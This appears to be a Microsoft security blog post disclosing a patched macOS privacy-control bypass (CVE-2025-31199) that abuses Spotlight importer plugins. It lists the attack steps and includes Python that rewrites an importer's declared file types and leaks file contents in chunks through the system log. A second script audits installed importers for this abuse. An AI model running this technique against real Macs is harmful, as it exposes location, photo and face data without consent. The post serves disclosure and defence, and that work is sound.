Microsoft Security

Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability

Credit to Author: Microsoft Threat Intelligence | Date: Mon, 28 Jul 2025 16:00:00 +0000

Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data from files normally protected by Transparency, Consent, and Control (TCC), such as files in the Downloads folder, as well as the caches used by Apple Intelligence. While similar to prior TCC bypasses like HM-Surf and powerdir, the implications of this vulnerability, which we refer to as “Sploitlight” for its use of Spotlight plugins, are more severe because it can extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. These risks are further heightened because this metadata syncs between devices linked to the same iCloud account: an attacker with access to a user’s macOS device could also exploit the vulnerability to infer information about the user’s other linked devices.

After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2025-31199, as part of the macOS Sequoia security updates released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.

As a reminder, TCC is a technology designed to prevent applications from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without obtaining prior consent and knowledge from users. The only legitimate method for an application to gain access to these services is through user approval via a popup prompt within the user interface or by granting per-app access in the operating system’s settings.

In this blog post, we show how, despite Spotlight plugins being carefully and heavily restricted to keep their privileged access to sensitive files in check, they can still be abused to exfiltrate file contents. Our research demonstrates how this privileged access, combined with the ability to manipulate these plugins, blurs the line between operating system components, like the mds daemon and the mdworker task, and non-OS components, like the plugins themselves. Further, we show how the TCC bypass works against well-defined file types, and how it could be abused to obtain valuable data such as information tagged by Apple Intelligence and information about other devices linked to the same iCloud account.

Background: Spotlight importers

Spotlight is the built-in macOS search feature, which finds content on a device quickly by indexing it. Users trigger a search with the Command+Space shortcut. Spotlight also supports plugins, known as Spotlight importers, that index additional kinds of data found on a device; for example, Outlook’s importer indexes emails so they appear in search results. These plugins are macOS bundles with an .mdimporter suffix, and they can be listed with the mdimport utility’s -L command line flag:

Screenshot of code depicting a list of Spotlight plugins on a typical system
Figure 1. A list of Spotlight plugins on a typical system

To support this architecture, the technology follows a producer-consumer design: tools such as Spotlight (or the mdfind command-line utility) consume data from index files saved locally, and an indexing service produces and updates those index files.

The indexing service is a system daemon known as mds. Upon file modifications, the kernel notifies the mds daemon, which in turn spawns a heavily sandboxed task called mdworker; mdworker runs the plugin logic and updates the index.

Spotlight plugins have been studied in the past; notable examples include:

Spotlight plugins declare which file types they can process in their Info.plist file; when the mds daemon scans a file of such a type, an mdworker task eventually invokes the plugin’s GetMetadataForFile function.

Turning a plugin into a TCC bypass

We have covered several TCC bypasses in the past, such as CVE-2021-30970 (“powerdir”) and CVE-2024-44133 (“HM-Surf”). As a reminder, TCC is a technology that prevents apps from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without their prior consent and knowledge. In this blog post, we shall focus primarily on access to private files protected by TCC, such as the Downloads directory, the Pictures directory, or the user’s Desktop.

Because Spotlight plugins need privileged access to sensitive files for indexing, Apple restricts them heavily with the macOS sandbox. On modern macOS systems, a Spotlight plugin is not even permitted to read or write any file other than the one being scanned. We concluded that this is insufficient, however, because an attacker has multiple ways to exfiltrate the scanned file’s contents. In our exploit, we simply log the file’s bytes to the unified log in chunks:

Screenshot of code depicting the scanned file's contents being leaked via logging
Figure 2. Leaking the scanned file’s contents via logging

Assuming an attacker knows specific file types they wish to read, they can simply perform the following steps:

  1. Change the bundle’s Info.plist and schema.xml files to declare, in UTI form, the file types they wish to leak. Since we assume the attacker runs locally, the UTI can always be resolved, even for dynamic types.
  2. Copy the bundle into the ~/Library/Spotlight directory. Note that the bundle does not need to be signed at all.
  3. Force Spotlight to use the new bundle via the mdimport -r command, and validate that it is indeed loaded with the mdimport -L command.
  4. Use mdimport -i <path> to recursively scan the files under the given path and leak them. Note that the calling app needs no TCC permission for the indexed directory, because the read is performed by the mdworker task.
  5. Use the log utility to read the file contents.

The UTI of a dynamic type can be determined with the uttype utility, even when the calling app lacks TCC access to the relevant directory. For example, here is the resolution of the TCC-protected Photos.sqlite file:

Screenshot of code depicting the resolution of a dynamic type despite lack of TCC permissions
Figure 3. Resolution of a dynamic type even despite lack of TCC permissions

Note that since the .mdimporter bundle need not be signed, an attacker does not even need to recompile it to target other file types; they can simply edit Info.plist and schema.xml as they see fit. We therefore conclude that an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit focused on the Downloads folder; the Pictures folder later drew our attention.
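To make steps 1 and 5 concrete, here is an added example that models both ends of the channel in Python. It is not the Sploitlight POC (which Microsoft shared only with Apple) and is not shown in Figure 2: one function rewrites an importer’s Info.plist to claim a chosen list of UTIs, one produces the chunked messages a plugin would write to the unified log from GetMetadataForFile, and one reassembles the file from `log show` output, tolerating noise, duplicates and reordering. The plist keys follow Apple’s importer conventions (CFBundleDocumentTypes, CFBundleTypeRole "MDImporter", LSItemContentTypes); the "SPL" message tag, the chunk size, the digest check and the sample log lines and sample file are constructions of this example.

```python
"""Both ends of a log-based Spotlight exfiltration channel (added example, not the Sploitlight POC)."""
import base64
import hashlib
import plistlib
import random
import re

# Assumption: a payload size that keeps each message comfortably inside one unified-log entry.
CHUNK_SIZE = 768
# Real `log show` predicate syntax; the "SPL " prefix is this example's own marker.
LOG_SHOW_COMMAND = "log show --last 10m --predicate 'eventMessage BEGINSWITH \"SPL \"'"
CHUNK_RE = re.compile(r"SPL ([0-9a-f]{16}) (\d+)/(\d+) ([A-Za-z0-9+/=]*)$")

# Constructed minimal Info.plist of a stock importer that handles one registered type.
STOCK_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.stockimporter",
    "CFBundleDocumentTypes": [{"CFBundleTypeRole": "MDImporter",
                               "LSItemContentTypes": ["public.rtf"]}],
})


def declare_types(info_plist: bytes, utis: list[str]) -> bytes:
    """Step 1: rewrite an importer's Info.plist so it claims the given UTIs.

    Importers list the types they handle under CFBundleDocumentTypes ->
    LSItemContentTypes with CFBundleTypeRole "MDImporter"; every other key of
    the original plist is kept, which is why no recompilation is needed.
    """
    info = plistlib.loads(info_plist)
    doc_types = info.setdefault("CFBundleDocumentTypes", [])
    if not doc_types:
        doc_types.append({})
    doc_types[0].update({"CFBundleTypeRole": "MDImporter", "LSItemContentTypes": list(utis)})
    return plistlib.dumps(info)


def claimed_types(info_plist: bytes) -> list[str]:
    """All UTIs an importer declares across its document types."""
    info = plistlib.loads(info_plist)
    return [u for dt in info.get("CFBundleDocumentTypes", [])
            for u in dt.get("LSItemContentTypes", [])]


def emit_chunks(data: bytes) -> list[str]:
    """What GetMetadataForFile would log for one scanned file: one message per chunk,
    tagged with a short digest so chunks of different files never interleave."""
    digest = hashlib.sha256(data).hexdigest()[:16]
    pieces = [data[i:i + CHUNK_SIZE] for i in range(0, len(data), CHUNK_SIZE)] or [b""]
    return [f"SPL {digest} {i}/{len(pieces)} {base64.b64encode(p).decode()}"
            for i, p in enumerate(pieces)]


def reassemble(log_lines: list[str]) -> dict[str, bytes]:
    """Step 5: rebuild files from `log show` output.

    Unrelated lines are skipped and duplicates/reordering are tolerated; a file is
    returned (keyed by digest) only when every chunk arrived and the digest matches.
    """
    parts: dict[str, dict[int, bytes]] = {}
    totals: dict[str, int] = {}
    for line in log_lines:
        m = CHUNK_RE.search(line)
        if not m:
            continue  # noise from other processes or the importer's own messages
        digest, idx, total, b64 = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
        totals[digest] = total
        parts.setdefault(digest, {})[idx] = base64.b64decode(b64)
    recovered = {}
    for digest, chunks in parts.items():
        if any(i not in chunks for i in range(totals[digest])):
            continue  # still missing chunks
        data = b"".join(chunks[i] for i in range(totals[digest]))
        if hashlib.sha256(data).hexdigest()[:16] == digest:
            recovered[digest] = data
    return recovered


def fake_log_show(messages: list[str]) -> list[str]:
    """Constructed stand-in for `log show` output: prefixes the messages the way the
    tool prints entries, then mixes in an unrelated line and a duplicate, out of order."""
    prefix = "2025-03-31 10:00:00.000000+0000 0x1a2b Default 0x0 481 0 mdworker_shared: "
    lines = [prefix + m for m in messages]
    lines.append(prefix + "Importing /Users/alice/Downloads/report.pdf")  # unrelated entry
    if messages:
        lines.append(lines[0])  # duplicate delivery
    random.Random(7).shuffle(lines)
    return lines


if __name__ == "__main__":
    sample = bytes(range(256)) * 7  # constructed 1792-byte "file": three chunks
    recovered = reassemble(fake_log_show(emit_chunks(sample)))
    print("collect with:", LOG_SHOW_COMMAND)
    print("recovered intact:", list(recovered.values()) == [sample])
```

The digest does double duty: it keys chunks of different files apart when several files are scanned in one mdimport -i run, and it rejects a partial or corrupted reassembly instead of handing back a truncated file.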

We wrote a full proof-of-concept (POC) exploit, dubbed “Sploitlight”, that automates this entire process and shared it with Apple:

Screenshot of the Sploitlight POC exploit discovering and leaking files from Photos even though the Terminal does not have access
Figure 4. Exploitation – note the Terminal does not have access to Photos but files are still discovered and leaked

Exposing more sensitive data from Apple Intelligence

The ability to read sensitive files is more dangerous than it seems. As it turns out, Apple Intelligence (which is installed by default on Apple silicon, ARM-based devices) caches its data under various directories. For example, one such directory lives under the user’s Pictures directory:

Screenshot of index files created by Apple Intelligence, including Photos.sqlite and photos.db
Figure 5. Index files created by Apple Intelligence

Access to those files is governed by the “Pictures” TCC service, so they cannot be read without the user’s approval. However, as we previously demonstrated with the Sploitlight POC, we can leak arbitrary files’ contents and thus extract the contents of those database files.

There are many great utilities for extracting private information from Photos.sqlite and photos.db, but we’d like to summarize what information attackers would be able to obtain:

Type of data – Information obtained

Precise geolocation data
– GPS coordinates (latitude, longitude, altitude) associated with photos and videos.
– Time-stamped location history, potentially reconstructing a user’s movements over time.
– Reverse-geocoded addresses or place names.

Photo and video metadata
– Timestamps of when photos and videos were taken.
– Device model and camera settings (aperture, ISO, shutter speed).
– Media paths pointing to stored content.

Face and person recognition data
– Identified faces, sometimes linked to contact names if tagged.
– Clustering of photos by recognized individuals.

User activity and event context
– Photo-related activities, such as screenshots, saved images, and shared content.
– Event clustering (such as vacations, birthdays).

Photo albums and shared libraries
– User-defined photo albums and their contents.
– Shared album details, including participants.

Deleted photos and videos
– Metadata of recently deleted items that may still exist in the Recently Deleted section.

Image classification and object detection
– Labels and categories generated by the Photos app (such as “beach,” “dog,” “document”).

Search history and user preferences
– Previous search queries within the Photos app.

Screenshot of Photos.sqlite metadata
Figure 6. Getting file name, description, title, GPS location, and date from Photos.sqlite metadata

Alongside the implications of an attacker obtaining such detailed private information from a targeted user’s device, it is important to remember that Apple devices sharing the same iCloud account have different Photos.sqlite database files, but face tagging and other metadata propagate between them. This means that an attacker with access to a user’s macOS device could also infer information about other devices linked to that user’s iCloud account, such as data originating from the target user’s iPhone.

In addition, threat actors could just as easily gain private data from other Apple Intelligence cached files, such as email summaries and notes written with ChatGPT.

Strengthening protection against TCC bypass attacks

Attackers with the ability to bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to further exfiltrate private data from protected directories, such as the Downloads folder and Apple Intelligence caches, is particularly alarming given the highly sensitive nature of the information that can be extracted, including geolocation data, media metadata, and user activities. The implications of this vulnerability are even more extensive because devices signed in to the same iCloud account sync this metadata, enabling attackers to learn more about a user through their linked devices. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.

By understanding the broader impact of these security concerns, we can better defend users and ensure their digital safety. Microsoft Defender for Endpoint allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight in their increasingly heterogeneous networks. The insights gained from this research have enabled us to enhance Microsoft Defender for Endpoint’s detection mechanisms, providing protection against unauthorized access to private data by proactively detecting anomalous .mdimporter bundle installations, alongside suspicious indexing of sensitive directories:

Screenshot of Defender for Endpoint's detection reading Suspicious Spotlight operation
Figure 7. Microsoft Defender for Endpoint detection of unusual Spotlight operations
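As an added illustration of the host-side detection logic described above (example code written for this page, not part of Microsoft Defender for Endpoint), the following Python audits the importer directories for the traits the attack relies on: an unsigned bundle, an installation path the user can write to, and claimed types that are catch-all or dynamic. The codesign check only runs on macOS and degrades to “unknown” elsewhere; the two sample plists, the BROAD_UTIS list and the treatment of /Library and /Applications as vendor-owned are assumptions of this example.

```python
"""Audit installed Spotlight importers for the traits Sploitlight relies on (added example)."""
import plistlib
import subprocess
from pathlib import Path

USER_IMPORTER_DIR = Path.home() / "Library" / "Spotlight"  # where step 2 drops the bundle
SYSTEM_OWNED = ("/System/", "/Library/", "/Applications/")  # vendor- or admin-installed locations
# Assumption: catch-all types that a legitimate metadata importer has little reason to claim.
BROAD_UTIS = {"public.item", "public.data", "public.content", "public.database"}

# Constructed plists: one for an importer repurposed as in steps 1-2, one benign (not real bundles).
EVIL_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.repurposed",
    "CFBundleDocumentTypes": [{"CFBundleTypeRole": "MDImporter",
                               "LSItemContentTypes": ["public.data", "dyn.example-unregistered"]}],
})
BENIGN_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.rtf",
    "CFBundleDocumentTypes": [{"CFBundleTypeRole": "MDImporter",
                               "LSItemContentTypes": ["public.rtf"]}],
})


def claimed_types(info_plist: bytes) -> list[str]:
    """All UTIs an importer declares across its document types."""
    info = plistlib.loads(info_plist)
    return [u for dt in info.get("CFBundleDocumentTypes", [])
            for u in dt.get("LSItemContentTypes", [])]


def is_signed(bundle: Path):
    """codesign verdict for the bundle, or None when codesign is unavailable (non-macOS host)."""
    try:
        result = subprocess.run(["codesign", "--verify", "--strict", str(bundle)],
                                capture_output=True)
    except FileNotFoundError:
        return None
    return result.returncode == 0


def audit(bundle, info_plist: bytes, signed) -> list[str]:
    """Findings for one importer; an empty list means nothing stands out."""
    bundle = Path(bundle)
    findings = []
    if signed is False:
        findings.append("bundle is unsigned (mdworker loads it anyway)")
    if not str(bundle).startswith(SYSTEM_OWNED):
        findings.append(f"installed in a user-writable location: {bundle.parent}")
    for uti in claimed_types(info_plist):
        if uti in BROAD_UTIS:
            findings.append(f"claims catch-all type {uti}")
        elif uti.startswith("dyn."):
            findings.append(f"claims dynamic (unregistered) type {uti}, typical of app-private files")
    return findings


def scan(dirs=(USER_IMPORTER_DIR, Path("/Library/Spotlight"))) -> dict[str, list[str]]:
    """Audit every *.mdimporter bundle under the given directories."""
    report = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for bundle in sorted(d.glob("*.mdimporter")):
            plist = bundle / "Contents" / "Info.plist"
            if plist.is_file():
                report[str(bundle)] = audit(bundle, plist.read_bytes(), is_signed(bundle))
    return report


if __name__ == "__main__":
    for path, findings in scan().items():
        print(path, "->", "; ".join(findings) or "nothing unusual")
```

On a fleet, the same checks are cheap to run from an EDR script or a login hook; pair them with a log-volume alert on mdworker, since the exfiltration step in this post shows up as an unusual burst of unified-log messages from the importer during an mdimport -i run.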

By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. Moreover, this research emphasizes the importance of continuous vigilance and collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.

We encourage users to ensure they have applied the security updates released by Apple to mitigate this issue.

As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.

Jonathan Bar Or

Alexia Wilson

Christine Fossaceca
Microsoft Threat Intelligence

Learn more

Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.

Security Copilot customers can use the standalone experience to create their own prompts or run pre-built promptbooks to automate incident response or investigation tasks related to this threat.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability appeared first on Microsoft Security Blog.
